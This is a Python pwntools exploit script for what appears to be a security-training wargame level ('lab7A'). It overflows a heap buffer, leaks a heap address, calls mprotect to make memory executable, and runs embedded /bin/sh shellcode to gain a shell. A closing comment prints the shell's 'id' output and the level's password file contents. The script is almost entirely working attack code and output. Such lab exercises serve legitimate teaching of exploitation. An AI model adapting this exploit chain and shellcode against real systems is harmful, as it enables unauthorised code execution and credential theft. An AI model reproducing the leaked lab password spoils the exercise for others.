lab7A_exploit.py

from pwn import *
import struct
from binascii import hexlify as hexa
# context.log_level = 'debug'

shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'

# p = process('./lab7A')
p = remote("127.0.0.1", 7741)
raw_input('Press Enter')

p.recvuntil(':')

p.sendline('1')
p.recvuntil(':')
p.sendline('131')
p.recvuntil(':')
p.sendline('C'*131)
p.recvuntil(':')
p.sendline('1')
p.sendline('4')
p.sendline('A'*3)
p.recvuntil(':')

stack = '1' + '\x00' + 'A'*6+p32(0x8050bf0)+p32(0x8049569)+p32(0x80eef60)

p.sendline('2')
p.recvuntil(':')
p.sendline('0')
p.recvuntil(':')

gadget = p32(0x0807e372)

pattern = 'D'*132 + p32(0x0) + p32(0x0) + gadget

p.sendline(pattern)

p.sendline('4')
p.recvuntil(':')
print p.recvuntil('Enter Choice: ')
p.sendline(stack)
leak = p.recvuntil('Enter Choice: ')

heap = leak[73:73+4]
print hexa(heap)
ba = bytearray.fromhex(hexa(heap))
ba.reverse()

print 'Heap address: ' + hex(struct.unpack(">L",ba)[0]-0x19d8)

# mprotect(heap_address, size, flag (rwx = 0x7))

return_after_mprotect = p32(struct.unpack(">L",ba)[0]-0x19d8+0x1aec)

print 'Return_after_mprotect: ' +  hex(struct.unpack(">L",ba)[0]-0x19d8+0x1aec)

stack2 = '1' + '\x00' + 'A'*6+p32(0x806f340)+return_after_mprotect+p32(struct.unpack(">L",ba)[0]-0x19d8)+p32(0x22000)+p32(0x7)
p.sendline('1')
p.sendline('131')
p.sendline('C'*130)

p.sendline('1')
p.sendline('4')
p.sendline('A'*4)

p.recvuntil('Enter Choice: ')
p.sendline('2')
p.sendline('0')
pattern2 = 'D'*132 + p32(0x0) + p32(0x0) + gadget + shellcode
p.sendline(pattern2)

p.sendline('4')
p.sendline(stack2)

p.recvuntil('Enter Choice: ')
p.interactive()

'''
$ id
uid=1028(lab7end) gid=1029(lab7end) groups=1029(lab7end),1001(gameuser)
$ cat /home/lab7end/.pass
0verfl0wz_0n_th3_h3ap_4int_s0_bad
'''